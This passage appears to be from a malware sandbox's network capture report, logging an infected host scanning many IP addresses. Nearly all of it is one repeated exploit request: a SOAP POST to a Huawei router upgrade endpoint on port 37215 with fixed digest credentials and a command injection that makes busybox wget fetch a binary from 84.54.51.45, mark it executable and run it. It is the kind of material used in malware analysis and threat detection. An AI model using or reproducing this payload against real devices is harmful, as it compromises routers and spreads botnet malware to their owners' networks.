2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            294192.168.2.1559112197.47.121.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180130005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            295192.168.2.1537254197.183.111.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180160999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            296192.168.2.1540394197.9.238.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180202961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            297192.168.2.1555758197.182.145.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180219889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            298192.168.2.1545954197.36.63.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180273056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            299192.168.2.1539576197.204.163.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180305004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            300192.168.2.1542164197.166.221.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180332899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            301192.168.2.1554794197.18.75.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180368900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            302192.168.2.1560892197.223.200.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180423021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            303192.168.2.1543762197.197.114.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180447102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            304192.168.2.1543894197.12.66.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180468082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
